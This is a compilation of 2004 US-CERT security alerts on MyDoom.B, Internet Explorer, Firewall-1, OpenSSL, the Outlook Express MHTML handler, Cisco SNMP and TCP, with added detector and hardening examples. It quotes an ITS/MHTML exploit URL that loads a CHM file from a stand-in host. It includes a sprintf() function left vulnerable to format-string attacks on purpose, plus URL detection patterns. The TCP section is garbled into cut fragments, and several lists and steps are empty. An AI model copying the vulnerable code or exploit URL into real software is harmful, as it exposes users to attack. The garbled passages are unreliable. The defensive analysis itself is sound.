MyDoom.B Virus

Description
Emails sent out by MyDoom.B are generated randomly. The From address may also be spoofed to appear as though the message is from a different address. The subject of the message will include one of the following: Not all email messages with these subject lines carry the MyDoom.B virus; some may be legitimate status messages. The message body will include one of the following: The attachment will have one of the following filenames: The filename also contains an extension (.exe, .bat, .scr, .cmd, or .pif). When the attachment is opened, the MyDoom.B virus is launched and the system is infected.

Prevention
To protect your systems from infection by this virus, we recommend that you take the following steps. In addition to these steps, US-CERT encourages home users to review the "Home Network Security" and "Home Computer Security" documents.

It is important that you use antivirus software and keep it up to date. Most antivirus software vendors frequently release updated information, tools, or virus databases to help detect and recover from virus infections. Many antivirus packages support automatic updates of virus definitions. US-CERT recommends using these automatic updates when possible. You may wish to read CERT Incident Note IN-2003-01 for more information on antivirus software and security issues.

Do not download, install, or run a program unless it was written by a person or company that you trust. Email users should be wary of unexpected attachments. Be sure you know the source of an attachment before opening it. Also remember that it is not enough that the mail originated from an email address you recognize: the Melissa virus spread precisely because it originated from a familiar email address. In addition, MyDoom.B attempts to spread through file-sharing services like KaZaA. Peer-to-peer file sharing users should be particularly careful of running software sent to them by other users. This is a commonly used method among intruders attempting to build networks of distributed denial-of-service (DDoS) agents.

A personal firewall will not necessarily protect your system from an email-borne virus, but a properly configured personal firewall may prevent the virus from downloading additional components or launching attacks against other systems.

Detection
To confirm that your system has been infected with the MyDoom.B virus, perform the following steps.

MyDoom.B overwrites the Windows 'hosts' file. The replacement file will probably prevent your system from accessing your antivirus vendor's web site as well as some other web sites. You can check your hosts file by following these steps (Windows NT/2000/XP systems):

MyDoom.B drops several files on an infected computer. The existence of these files is a good indication of infection. Be aware that there are legitimate Windows files with names similar to those left by the virus. Only files with these names and in these specific directories indicate an infection (Windows NT/2000/XP systems):

The MyDoom.B virus also makes some changes to the Windows registry. Users who are unfamiliar with the registry should probably skip this step, because accidental changes may cause serious damage to the operating system (Windows 95/98/Me/NT/2000/XP systems):

Recovery
If your system is infected, you will probably be unable to access your antivirus vendor's web site for assistance due to some changes the virus has made to your system. If this is the case, follow these steps to delete a file installed by the virus (do not do this unless you are infected; it may affect the normal operation of your system) on Windows NT/2000/XP systems:

After deleting this file, you should be able to access your antivirus vendor's web site, obtain the updates to your antivirus software and perform a full scan of your system. Some antivirus vendors may produce a removal tool and make it available on their web site. If your vendor provides such a tool, you may want to use it first. If you are still unsuccessful at removing the virus, contact your antivirus vendor to obtain further assistance with removal and recovery.

For additional technical details about this virus, please see US-CERT Technical Alert TA04-028A.

Copyright 2004 Carnegie Mellon University.
January 28, 2004: Initial release
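The hosts-file check above is described without its steps. As an added example that is not part of the US-CERT alert, the C program below scans hosts-file text and flags every hostname pinned to a loopback or unspecified address, which is how a tampered hosts file silently blocks access to vendor and update sites. The sample hosts text and the domain names in it are constructed placeholders.

```c
#include <stdio.h>
#include <string.h>

#define NAME_MAX_LEN 128
#define MAX_FLAGGED  32

/* Addresses that make a name resolve to "nowhere": traffic to the name never
 * leaves the machine, which is how a tampered hosts file blocks a vendor site. */
static int is_sinkhole_address(const char *addr)
{
    return strcmp(addr, "127.0.0.1") == 0 ||
           strcmp(addr, "0.0.0.0") == 0 ||
           strcmp(addr, "::1") == 0;
}

/* Names that legitimately map to the loopback address on a clean system. */
static int is_expected_local_name(const char *name)
{
    return strcmp(name, "localhost") == 0 ||
           strcmp(name, "localhost.localdomain") == 0 ||
           strcmp(name, "ip6-localhost") == 0;
}

/* Scan hosts-file text line by line. Every hostname that is pinned to a sinkhole
 * address (other than the expected local names) is copied into flagged[]; the
 * return value is the total found, even when it exceeds max_flagged. */
int find_sinkholed_names(const char *hosts_text,
                         char flagged[][NAME_MAX_LEN], int max_flagged)
{
    char line[512];
    int found = 0;
    const char *p = hosts_text;

    while (*p) {
        /* Copy one line into line[], truncating over-long lines but always
         * advancing p to the start of the next line. */
        size_t full = strcspn(p, "\n");
        size_t n = full < sizeof line ? full : sizeof line - 1;
        memcpy(line, p, n);
        line[n] = '\0';
        p += full;
        if (*p == '\n') p++;

        /* Strip comments; the first token is the address, the rest are names. */
        char *hash = strchr(line, '#');
        if (hash) *hash = '\0';
        char *addr = strtok(line, " \t\r");
        if (!addr || !is_sinkhole_address(addr)) continue;

        for (char *name = strtok(NULL, " \t\r"); name; name = strtok(NULL, " \t\r")) {
            if (is_expected_local_name(name)) continue;
            if (found < max_flagged) {
                strncpy(flagged[found], name, NAME_MAX_LEN - 1);
                flagged[found][NAME_MAX_LEN - 1] = '\0';
            }
            found++;
        }
    }
    return found;
}

/* Constructed sample of a tampered hosts file; the domains are placeholders,
 * not real vendor addresses. */
const char *SAMPLE_HOSTS =
    "# hosts file, constructed sample\n"
    "127.0.0.1       localhost\n"
    "0.0.0.0         www.antivirus-vendor.example\n"
    "0.0.0.0         update.antivirus-vendor.example\n"
    "127.0.0.1       www.security-updates.example   # pinned to loopback\n"
    "192.168.1.10    printer.lan\n";

int main(void)
{
    char flagged[MAX_FLAGGED][NAME_MAX_LEN];
    int n = find_sinkholed_names(SAMPLE_HOSTS, flagged, MAX_FLAGGED);

    printf("%d suspicious hosts entries\n", n);
    for (int i = 0; i < n && i < MAX_FLAGGED; i++)
        printf("  %s\n", flagged[i]);
    return 0;
}
```
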
Multiple Vulnerabilities in Microsoft Internet Explorer
Microsoft Internet Explorer (IE) contains multiple vulnerabilities, the most serious of which could allow attackers in any location to run programs of their choice on your computer using the same privileges as you have.
Microsoft's Home User Security Bulletin for February 2004 describes three vulnerabilities in Internet Explorer (IE). Note that in addition to IE, any applications that use IE to interpret HTML documents, such as email programs, may present additional ways for these vulnerabilities to be used. A technical description of these vulnerabilities is available from US-CERT in TA04-033A and from Microsoft in MS04-004.

Microsoft has released a home user bulletin describing how to determine what patches you will need and how to get them. Follow the procedures outlined in Microsoft's Home User Security Bulletin for February 2004. For additional information, and to receive updates on this alert, go to http://www.us-cert.gov. This document is available from <http://www.us-cert.gov/cas/alerts/SA04-033A.html>.

February 02, 2004: Initial release

HTTP Parsing Vulnerabilities in Check Point Firewall-1
The Application Intelligence (AI) component of Check Point Firewall-1 is an application proxy that scans traffic for application layer attacks once it has passed through the firewall at the network level. Earlier versions of Firewall-1 include the HTTP Security Server, which provides similar functionality.
Both the AI and HTTP Security Server features contain an HTTP parsing vulnerability that is triggered by sending an invalid HTTP request through the firewall. When Firewall-1 generates an error message in response to the invalid request, a portion of the input supplied by the attacker is included in the format string for a call to sprintf().
Researchers at Internet Security Systems have determined that it is possible to exploit this format string vulnerability to execute commands on the firewall. The researchers have also determined that this vulnerability can be exploited as a heap overflow, which would allow an attacker to execute arbitrary code. In either case, the commands or code executed by the attacker would run with administrative privileges, typically "SYSTEM" or "root". For more information, please see the ISS advisory at: http://xforce.iss.net/xforce/alerts/id/162

The CERT/CC is tracking this issue as VU#790771. This reference number corresponds to CVE candidate CAN-2004-0039.

Impact
This vulnerability allows remote attackers to execute arbitrary code on affected firewalls with administrative privileges, typically "SYSTEM" or "root".

Solution
Check Point has published a "Firewall-1 HTTP Security Server Update" that modifies the error return strings used when an invalid HTTP request is detected. For more information, please see the Check Point bulletin at: http://www.checkpoint.com/techsupport/alerts/security_server.html

Check Point has reported that their products are only affected by this vulnerability if the HTTP Security Servers feature is enabled. Therefore, affected sites may be able to limit their exposure to this vulnerability by disabling HTTP Security Servers or the Application Intelligence component, as appropriate.

This vulnerability was discovered and researched by Mark Dowd of ISS X-Force. This document was written by Jeffrey P. Lanza. This document is available from http://www.us-cert.gov/cas/techalerts/TA04-036A.html

02/05/2004: Initial release

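The flaw described above, an error message built by passing attacker-supplied request text as the format string of sprintf(), is illustrated in the added C example below beside the hardened form that the vendor's fix ("modifies the error return strings") amounts to. This is illustrative code, not Check Point's; the function names and message text are assumptions, and the probe input uses only "%%", which consumes no arguments and so cannot crash the process.

```c
#include <stdio.h>
#include <string.h>

#define ERR_MAX 256

/* Flawed shape: the request fragment is folded into the format string itself,
 * so any conversion specifiers it contains are interpreted by sprintf(). The
 * pragmas silence the compiler warning that would normally flag this. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
void build_error_flawed(char *out, const char *request_fragment)
{
    char fmt[ERR_MAX];
    snprintf(fmt, sizeof fmt, "Invalid HTTP request: %s", request_fragment);
    sprintf(out, fmt);   /* fmt is now partly attacker-controlled, and unbounded */
}
#pragma GCC diagnostic pop

/* Hardened shape: the format string is a compile-time constant, the fragment is
 * only ever consumed as a %s argument, and the output length is bounded. */
void build_error_hardened(char *out, size_t out_len, const char *request_fragment)
{
    snprintf(out, out_len, "Invalid HTTP request: %s", request_fragment);
}

/* A harmless probe: "%%" is a conversion that consumes no argument, so it cannot
 * crash, but it reveals whether the fragment is being treated as a format string. */
static const char *PROBE = "GET /%%index.html HTTP/1.0";

/* Returns 1 if the flawed builder rewrote "%%" to "%", i.e. interpreted the input. */
int flawed_interprets_input(void)
{
    char msg[ERR_MAX];
    build_error_flawed(msg, PROBE);
    return strstr(msg, "%%index") == NULL && strstr(msg, "/%index") != NULL;
}

/* Returns 1 if the hardened builder reproduced the fragment byte for byte. */
int hardened_preserves_input(void)
{
    char msg[ERR_MAX];
    build_error_hardened(msg, sizeof msg, PROBE);
    return strstr(msg, PROBE) != NULL;
}

int main(void)
{
    char msg[ERR_MAX];
    build_error_flawed(msg, PROBE);
    printf("flawed:   %s\n", msg);
    build_error_hardened(msg, sizeof msg, PROBE);
    printf("hardened: %s\n", msg);
    return 0;
}
```

The difference in the two outputs is the whole bug: once the input is part of the format string, the function's behaviour is chosen by whoever sent the request.
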
Multiple Vulnerabilities in Microsoft Windows
It is unclear at this time how many different ways your computer can be compromised using these vulnerabilities, so we recommend you apply the updates below as soon as possible. A technical description of these vulnerabilities is available from US-CERT in TA04-041A and from Microsoft in MS04-007.
Microsoft has released a home user bulletin describing how to determine what patches you will need and how to get them. Follow the procedures outlined in Microsoft's updated Home User Security Bulletin for February 2004. For additional information, and to receive updates on this alert, go to <http://www.us-cert.gov/cas/alerts/SA04-041A.html>, where this document is available.

February 10, 2004: Initial release

Vulnerability in Microsoft Outlook 2002
A technical description of these vulnerabilities is available from US-CERT in TA04-070A and from Microsoft in MS04-009.
Microsoft's Office Security Update for March 2004 links to the necessary patches. This document is available from <http://www.us-cert.gov/cas/alerts/SA04-070A.html>.

March 10, 2004: Initial release

Multiple Vulnerabilities in OpenSSL
VU#288574 - OpenSSL contains null-pointer assignment in do_change_cipher_spec() function
Versions of OpenSSL from 0.9.6c to 0.9.6k inclusive and 0.9.7a to 0.9.7c inclusive contain a null-pointer assignment in the do_change_cipher_spec() function. By performing a specially crafted SSL/TLS handshake, an attacker could cause OpenSSL to crash, which may result in a denial of service in the target application.

VU#484726 - OpenSSL does not adequately validate length of Kerberos tickets during SSL/TLS handshake
Versions 0.9.7a, 0.9.7b, and 0.9.7c of OpenSSL do not adequately validate the length of Kerberos tickets (RFC 2712) during an SSL/TLS handshake. OpenSSL is not configured to use Kerberos by default. By performing a specially crafted SSL/TLS handshake with an OpenSSL system configured to use Kerberos, an attacker could cause OpenSSL to crash, which may result in a denial of service in the target application. OpenSSL 0.9.6 is not affected.

VU#465542 - OpenSSL does not properly handle unknown message types
OpenSSL prior to version 0.9.6d does not properly handle unknown SSL/TLS message types. An attacker could cause the application using OpenSSL to enter an infinite loop, which may result in a denial of service in the target application. OpenSSL 0.9.7 is not affected.

Impact
An unauthenticated, remote attacker could cause a denial of service in any application or system that uses a vulnerable OpenSSL SSL/TLS library.

Solution
Upgrade to OpenSSL 0.9.6m or 0.9.7d. Alternatively, upgrade or apply a patch as specified by your vendor. Note that it is necessary to recompile any applications that are statically linked to the OpenSSL SSL/TLS library.

Multiple vendors are affected by different combinations of these vulnerabilities. For updated information, please see the Systems Affected sections of VU#288574, VU#484726, and VU#465542.

These vulnerabilities were researched and reported by the OpenSSL Project and the U.K. National Infrastructure Security Co-ordination Centre (NISCC). Feedback can be directed to the authors: Art Manion and Damon Morda.

March 18, 2004: Initial release

Continuing Threats to Home Users
Alert SA04-079A. Original release date: March 19, 2004.

There are a number of pieces of malicious code spreading on the Internet through email attachments, peer-to-peer file sharing networks and known software vulnerabilities.

Intruders target home users who have cable modem and DSL connections because many home users do not keep their machines up to date with security patches and workarounds, do not run current anti-virus software, and do not exercise caution when handling email attachments. Everyone should take precautions, patch vulnerabilities, and recover if you have been compromised.

US-CERT is currently tracking the incident activity related to several pieces of malicious code: Phatbot, W32/Beagle, W32/Netsky and W32/MyDoom.

The Phatbot Trojan horse is a piece of malicious code that allows a remote attacker to control a large number of systems. Phatbot attempts to propagate by exploiting vulnerabilities in the Microsoft Windows operating system for which users have not applied the available patches. If your computer is infected, a remote attacker will have access to your files and programs.

The W32/Beagle virus is a mass-mailing virus that arrives as an attachment to an email message. To be infected, a user must open the attachment. There are many variants of this virus. Some may require a password which is included in the email message.

The Netsky.B virus, described in IN-2004-02, is a mass-mailing virus that attempts to propagate either as an attachment to an email message or by copying itself to Windows network shares.

The MyDoom virus, described in TA04-028A, is a mass-mailing virus that attempts to propagate as an attachment to an email message.

Prevention
There are steps you can take to better protect your system from these attacks:

Many viruses spread by exploiting known vulnerabilities in unpatched systems. It is very important for users to apply security-related patches to their operating systems and applications.

US-CERT strongly recommends using anti-virus software. Most current anti-virus software products detect and alert the user of viruses. It is important to keep them up to date with current virus and attack signatures supplied by the software vendor. Many anti-virus packages support automatic updates of virus definitions. We recommend using these automatic updates when available.

US-CERT also recommends using a firewall product. In some situations, these products may be able to alert users to the fact that their machine has been compromised. Furthermore, they have the ability to block intruders from accessing backdoors over the network. However, no firewall can detect or stop all attacks, so it is important to continue to follow safe computing practices.

The technical measures listed above do not provide a complete solution for securing a system. There are some best practices you can follow: For additional information about securing home systems and networks, please see the references below.

Recovery
If the protective measures above, or other indicators, reveal that a system has already been compromised, more drastic steps need to be taken to recover. In general, the only way to ensure that a compromised computer is free from backdoors and intruder modifications is to re-install the operating system and install patches before connecting back to the network. Sometimes using an anti-virus software package to "clean" the system may not be enough.

Authors: Brian B. King, Damon Morda

Cross-Domain Vulnerability in Outlook Express MHTML Protocol Handler
Programs that use the WebBrowser ActiveX control or the IE HTML rendering engine (MSHTML) may be affected by this vulnerability. Internet Explorer, Outlook, and Outlook Express are all examples of such programs.
US-CERT is tracking this issue as VU#323070. This reference number corresponds to CVE candidate CAN-2004-0380.

Impact
By convincing a victim to view an HTML document such as a web page or HTML email message, an attacker could access data or execute script in a different security domain than the one containing the attacker's document. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user invoking the MHTML handler. The attacker may also be able to read or modify data in other web sites (including reading cookies or content and modifying or creating content).

Publicly available exploit code exists for this vulnerability. US-CERT has monitored incident reports that indicate that this vulnerability is being exploited. The Ibiza trojan, variants of W32/Bugbear, and BloodHound.Exploit.6 are some examples of malicious code that exploit this vulnerability. Any arbitrary payload could be delivered via this vulnerability, and different anti-virus vendors may identify malicious code with different names.

Most of the observed exploit code uses InfoTech Storage (ITS) protocol handlers and Compiled HTML Help (CHM) files to parse an HTML file in the Local Machine Zone. CHM files use the ITS format to store components such as HTML files, graphic files, and ActiveX objects, and Windows provides several protocol handlers that can access ITS files and individual CHM components: its:, ms-its:, ms-itss:, and mk:@MSITStore:. When referencing an inaccessible or non-existent MHTML file using the ITS and mhtml: protocols, IE can access a CHM file from an alternate location. Because of the vulnerability in the MHTML handler, IE incorrectly treats the CHM file as if it were in the same domain as the unavailable MHTML file. Using a specially crafted URL, an attacker can cause arbitrary script in a CHM file to be executed in a different domain, violating the cross-domain security model.

Any programs, including other web browsers, that use the Windows protocol handlers (URL monikers) for ITS or MHTML protocols could function as attack vectors. Also, due to the way that IE determines MIME types, HTML and CHM files may not have the expected file name extensions (.htm/.html and .chm respectively). A malicious web site or email message may contain HTML similar to the following:

ms-_its:_mhtml:_file://C:\nosuchfile.mht!_http://www.example.com//exploit._chm::exploit.html

In this example, HTML and script in exploit.html will be executed in the security context of the Local Machine Zone. It is common practice for exploit.html to either contain or download an executable payload such as a backdoor, trojan horse, virus, bot, or other malicious code. Note that it is possible to encode a URL in an attempt to bypass HTTP content inspection or anti-virus software.

Solution

Install a patch
Install the appropriate cumulative patch for Outlook Express according to Microsoft Security Bulletin MS04-013.

Disable ITS and MHTML protocol handlers
Disabling the ITS and MHTML protocol handlers appears to prevent exploitation of this vulnerability. Delete or rename the following registry keys:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk,mhtml}

Disabling these protocol handlers will significantly reduce the functionality of the Windows Help system and may have other unintended consequences. Plan to undo these changes after patches have been tested and installed.

Follow good Internet security practices
These recommended security practices will help to reduce exposure to attacks and mitigate the impact of cross-domain vulnerabilities. Additional recommendations can be found under Mitigating Factors and Workarounds in the Vulnerability Details section of MS04-013.

Disable Active scripting and ActiveX controls

Do not follow unsolicited links
Do not click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels.

Maintain updated anti-virus software
Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page.

Please see Microsoft Security Bulletin MS04-013.

This vulnerability was reported by Liu Die Yu. Thanks to http-equiv for additional research and collaboration. Feedback can be directed to the author: Art Manion.

April 8, 2004: Initial release

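The alert notes that attackers may percent-encode the URL to slip past content inspection. As an added example, not part of the US-CERT alert, the C function below does what an inspecting proxy or mail filter would need to do: decode and lowercase a URL first, then look for the shape described above (an ITS-family scheme, then mhtml:, then a "::" component reference into the archive). The sample URLs are constructed with placeholder host and file names; they are not captured samples.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Percent-decode url into out (bounded) and lowercase it, so that encoded or
 * mixed-case variants compare the same as the plain form. */
static void normalize_url(const char *url, char *out, size_t out_len)
{
    size_t o = 0;
    for (size_t i = 0; url[i] != '\0' && o + 1 < out_len; i++) {
        unsigned char c = (unsigned char)url[i];
        if (c == '%' && isxdigit((unsigned char)url[i + 1]) &&
            isxdigit((unsigned char)url[i + 2])) {
            char hex[3] = { url[i + 1], url[i + 2], '\0' };
            c = (unsigned char)strtol(hex, NULL, 16);
            i += 2;
        }
        out[o++] = (char)tolower(c);
    }
    out[o] = '\0';
}

/* The ITS-family handlers named in the alert (lowercased). */
static const char *ITS_SCHEMES[] = { "ms-itss:", "ms-its:", "its:", "mk:@msitstore:" };

/* Returns 1 when the URL has the shape described in the alert: an ITS-family
 * scheme, followed by mhtml:, followed by a "::" reference to a component inside
 * the CHM archive. Ordinary Help URLs (ms-its: without mhtml:) and plain mhtml:
 * URLs do not match. */
int is_its_mhtml_chain(const char *url)
{
    char norm[2048];
    normalize_url(url, norm, sizeof norm);

    const char *after_scheme = NULL;
    for (size_t k = 0; k < sizeof ITS_SCHEMES / sizeof ITS_SCHEMES[0]; k++) {
        const char *hit = strstr(norm, ITS_SCHEMES[k]);
        /* The scheme must start the URL or follow a non-alphanumeric character,
         * so "its:" inside some other word is not counted. */
        if (hit && (hit == norm || !isalnum((unsigned char)hit[-1]))) {
            after_scheme = hit + strlen(ITS_SCHEMES[k]);
            break;
        }
    }
    if (after_scheme == NULL) return 0;

    const char *mh = strstr(after_scheme, "mhtml:");
    if (mh == NULL) return 0;
    return strstr(mh, "::") != NULL;
}

/* Constructed test inputs: the first two follow the pattern quoted in the alert
 * (one plain, one percent-encoded and upper-cased); the rest are benign shapes. */
const char *SAMPLE_URLS[] = {
    "ms-its:mhtml:file://C:\\missing.mht!http://host.example/archive.chm::page.html",
    "MS-ITS%3Amhtml%3Afile%3A//C%3A%5Cmissing.mht!http%3A//host.example/archive.chm%3A%3Apage.html",
    "http://www.example.com/index.html",
    "mhtml:file://C:\\docs\\page.mht",
    "ms-its:C:\\Windows\\Help\\example.chm::/intro.htm",
};
const int SAMPLE_URL_COUNT = 5;

int main(void)
{
    for (int i = 0; i < SAMPLE_URL_COUNT; i++)
        printf("%s  %s\n", is_its_mhtml_chain(SAMPLE_URLS[i]) ? "FLAG" : "ok  ",
               SAMPLE_URLS[i]);
    return 0;
}
```
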
Summary of Windows Security Updates for April 2004
A technical description of these vulnerabilities is available from US-CERT in TA04-104A and from Microsoft in MS04-011, MS04-012, MS04-013, and MS04-014.
Follow the procedures outlined in Microsoft's Windows Security Updates for April 2004. Feedback about this alert should be sent to the author, Mindi McDowell, at "US-CERT Security Alerts" at <mailto:cert@cert.org>. Please include the Subject line "SA04-104A Feedback VU#667571".

April 13, 2004: Initial release

Multiple Vulnerabilities in Microsoft Products
MS04-011 (Security Update for Microsoft Windows)
Impact
Remote attackers could execute arbitrary code on vulnerable systems.
Vulnerability identifiers: CAN-2003-0533, CAN-2003-0663, CAN-2003-0719, CAN-2003-0806, CAN-2003-0906, CAN-2003-0907, CAN-2003-0908, CAN-2003-0909, CAN-2003-0910, CAN-2004-0117, CAN-2004-0118, CAN-2004-0119, CAN-2004-0120, CAN-2004-0123

MS04-012 (RPC and DCOM)
This bulletin addresses several new vulnerabilities affecting the systems listed below. These vulnerabilities are in Microsoft Windows Remote Procedure Call (RPC) and Distributed Component Object Model (DCOM).
Impact
Remote attackers could execute arbitrary code on vulnerable systems.
Vulnerability identifiers: CAN-2003-0813, CAN-2004-0116, CAN-2003-0807, CAN-2004-0124

MS04-013 (MHTML protocol handler, Outlook Express)
This bulletin addresses a vulnerability affecting the systems listed below. The vulnerability affects the Microsoft Windows MHTML protocol handler and any applications that use it, including Microsoft Outlook and Internet Explorer. This vulnerability has been assigned VU#323070 and CAN-2004-0380.
Impact
Remote attackers could execute arbitrary code on vulnerable systems.
Systems affected
Note: This issue affects systems with Outlook Express installed. Outlook Express is installed by default on most (if not all) current versions of Microsoft Windows.

MS04-014 (Jet Database Engine)
This bulletin addresses a vulnerability affecting the systems listed below. There is a buffer overflow vulnerability in Microsoft's Jet Database Engine (Jet). An attacker could take control of a vulnerable system, including installing programs; viewing, changing, or deleting data; or creating new accounts that have full privileges. This vulnerability has been assigned VU#740716 and CAN-2004-0197.
Impact
Remote attackers could execute arbitrary code on vulnerable systems.

Update on the MHTML cross-domain vulnerability
Microsoft has released a patch that addresses the cross-domain vulnerability discussed in TA04-099A: Vulnerability in Internet Explorer ITS Protocol Handler. US-CERT is tracking this issue as VU#323070. This reference number corresponds to CVE candidate CAN-2004-0380. The patches and further information about the vulnerability are available in Microsoft Security Bulletin MS04-013. MS04-013 is titled Cumulative Security Update for Outlook Express. Since most (if not all) current Windows systems have Outlook Express installed by default, and the MHTML protocol handler is part of the Outlook Express software package, most (if not all) Windows systems should be considered vulnerable. TA04-099A and VU#323070 focused on the ITS protocol handlers; however, the latent vulnerability appears to be in the MHTML handler shipped as part of Outlook Express. These documents have been updated.

Impact
Several of the issues identified by Microsoft have been described as Critical in nature. Each bulletin contains at least one vulnerability which may allow remote attackers to execute arbitrary code on affected systems. The privileges gained would depend on the security context of the software and vulnerability exploited.

Solution
Please see the following site for more information about appropriate remediation: Windows Security Updates for April 2004.

Appendix A. Vendor Information
This appendix contains information provided by vendors for this technical alert. As vendors report new information to US-CERT, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Feedback: US-CERT Technical Alerts

April 13, 2004: Initial release

Cisco IOS SNMP Message Handling Vulnerability
The Simple Network Management Protocol (SNMP) is a widely deployed protocol that is commonly used to monitor and manage network devices. There are several types of SNMP messages that are used to request information or configuration changes, respond to requests, enumerate SNMP objects, and send both solicited and unsolicited alerts. These messages use UDP to communicate network information between SNMP agents and managers.
There is a vulnerability in Cisco's IOS SNMP service in which attempts to process specific SNMP messages are handled incorrectly. This may potentially cause the device to reload.
Typically, ports 161/udp and 162/udp are used during SNMP operations to communicate. In addition to these well-known ports, Cisco IOS uses a randomly selected UDP port in the range from 49152/udp to 59152/udp (and potentially up to 65535) to listen for other types of SNMP messages. While SNMPv1 and SNMPv2c formatted messages can trigger this vulnerability, the greatest risk is exposed when any SNMPv3 solicited operation is sent to a vulnerable port.
Cisco notes in their advisory:

Cisco is tracking this issue as CSCed68575. US-CERT is tracking this issue as VU#162451.

Impact
A remote, unauthenticated attacker could cause the vulnerable device to reload. Repeated exploitation of this vulnerability could lead to a sustained denial of service condition.

Solution
Cisco has published detailed information about upgrading affected Cisco IOS software to correct this vulnerability. System managers are encouraged to upgrade to one of the non-vulnerable releases. For additional information regarding availability of repaired releases, please refer to the "Software Versions and Fixes" section of the Cisco Security Advisory.

Cisco recommends a number of workarounds, including disabling SNMP processing on affected devices. For a complete list of workarounds, see the Cisco Security Advisory.

Appendix A. Vendor Information
This appendix contains information provided by vendors for this

Please refer to Cisco Security Advisory: "Vulnerabilities in SNMP Message Processing".

US-CERT thanks Cisco Systems for notifying us about

Feedback can be directed to the authors: Jeff Havrilla, Shawn Hernan, Damon Morda

The latest version of this document can be found at: http://www.us-cert.gov/cas/techalerts/TA04-111B.html

April 20, 2004: Initial release

Vulnerabilities in TCP
Paul Watson has performed the statistical analysis of this attack when the Since TCP is an insecure protocol, it is possible to inject The Border Gateway Protocol (BGP) is used to exchange routing In a TCP session, the endpoints can negotiate a TCP Window size. When To protect against such injections, RFC 2385 provides a method of US-CERT is tracking this issue as VU#415294. This NISCC is tracking this issue as Vulnerability Advisory 236929. Sustained exploitation of the TCP injection vulnerability with regard to Since the TCP/IP Initial Please see your vendor's statement regarding the availability of TCP initial sequence numbers were not designed to provide proof against The key idea with an The solutions presented above have the desirable attribute of not Ingress filtering manages You can configure your BGP routers to only accept packets on a specific Servers are typically the only machines that need to accept inbound In the network usage policy of many sites, there are few reasons for Thus, ingress filtering should be performed at the border to prohibit In this fashion, the effectiveness of many intruder scanning techniques
Complex networks can benefit by separating data channels and control Egress filtering manages the flow of traffic as it leaves a network There is typically limited need for machines providing public services to In the case of BGP, only your BGP routers should be establishing For vendor information, please see NISCC Vulnerability Advisory 236929 US-CERT thanks Paul Watson, Cisco Systems and NISCC for notifying us Feedback can be directed to the US-CERT
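The two technical points above, the window-size analysis and the RFC 2385 signature option, carried through in an added example (this is not the alert's or any vendor's code). It assumes IPv4, a 20-byte MD5 option with padding in the header, documentation addresses from RFC 5737 and a made-up peering key; the BGP KEEPALIVE bytes are constructed:

```python
# Added example: guess counts behind the window-size analysis, and the
# RFC 2385 TCP MD5 signature that lets a receiver drop spoofed segments.
import hashlib
import hmac
import socket
import struct

TCP_PROTO = 6
SEQ_SPACE = 2 ** 32
FLAG_RST = 0x04
FLAG_ACK = 0x10
MD5_OPTION_LEN = 20  # kind 19, length 18, 16-byte digest, plus 2 bytes of padding


def spoofed_segments_needed(window_size, ports_to_try=1):
    """Segments a blind sender must emit for one sequence number to land in
    the receiver's window: any of window_size values out of 2**32 is
    accepted, so 2**32 / window_size guesses cover the space, multiplied by
    the number of source ports that have to be tried."""
    if window_size <= 0:
        raise ValueError("window size must be positive")
    return -(-SEQ_SPACE // window_size) * ports_to_try


def build_tcp_header(sport, dport, seq, ack, flags, window):
    """Fixed 20-byte TCP header with checksum and urgent pointer zero; the
    data offset reserves room for the MD5 option. Constructed helper."""
    data_offset_words = (20 + MD5_OPTION_LEN) // 4
    return struct.pack("!HHIIBBHHH", sport, dport, seq, ack,
                       data_offset_words << 4, flags, window, 0, 0)


def tcp_md5_digest(src_ip, dst_ip, tcp_header, payload, key):
    """RFC 2385 section 2: MD5 over the pseudo-header, the fixed TCP header
    with checksum zeroed (options excluded), the segment data, and the key."""
    segment_len = len(tcp_header) + MD5_OPTION_LEN + len(payload)
    pseudo_header = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
                     + struct.pack("!BBH", 0, TCP_PROTO, segment_len))
    header_zero_csum = tcp_header[:16] + b"\x00\x00" + tcp_header[18:]
    return hashlib.md5(pseudo_header + header_zero_csum + payload + key).digest()


def segment_is_authentic(src_ip, dst_ip, tcp_header, payload, key, received_digest):
    """Receiver-side check: recompute with the configured key and compare in
    constant time. Segments not signed with the key are dropped before they
    can reset or corrupt the session, whatever their sequence number."""
    expected = tcp_md5_digest(src_ip, dst_ip, tcp_header, payload, key)
    return hmac.compare_digest(expected, received_digest)


# Constructed peering: RFC 5737 documentation addresses and a made-up key.
PEER_A, PEER_B = "192.0.2.1", "192.0.2.2"
SHARED_KEY = b"example-peering-secret"


def demo():
    """Returns (keyed KEEPALIVE accepted, unkeyed in-window RST accepted)."""
    keepalive = b"\xff" * 16 + b"\x00\x13\x04"  # BGP KEEPALIVE: marker, length 19, type 4
    header = build_tcp_header(179, 40000, 1000, 5000, FLAG_ACK, 16384)
    digest = tcp_md5_digest(PEER_A, PEER_B, header, keepalive, SHARED_KEY)
    keyed_ok = segment_is_authentic(PEER_A, PEER_B, header, keepalive, SHARED_KEY, digest)

    # A RST whose sequence number falls inside the 16384-byte window would be
    # honoured by plain TCP; without the key its option digest cannot match
    # (an empty key stands in for whatever value the sender put there).
    rst = build_tcp_header(179, 40000, 1000 + 100, 0, FLAG_RST, 0)
    unkeyed_digest = tcp_md5_digest(PEER_A, PEER_B, rst, b"", b"")
    rst_ok = segment_is_authentic(PEER_A, PEER_B, rst, b"", SHARED_KEY, unkeyed_digest)
    return keyed_ok, rst_ok


if __name__ == "__main__":
    print("guesses needed, 16 KiB window:", spoofed_segments_needed(16384))
    print("guesses needed, 64 KiB window:", spoofed_segments_needed(65536))
    print("keyed accepted / unkeyed RST accepted:", demo())
```

The guess count shows why larger windows make blind resets practical, and the digest check shows why the key, not the sequence number, is what a peer should rely on; the ingress and egress filtering described above reduces who can even deliver such segments.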
April 20, 2004: Initial release
CVS Heap Overflow Vulnerability
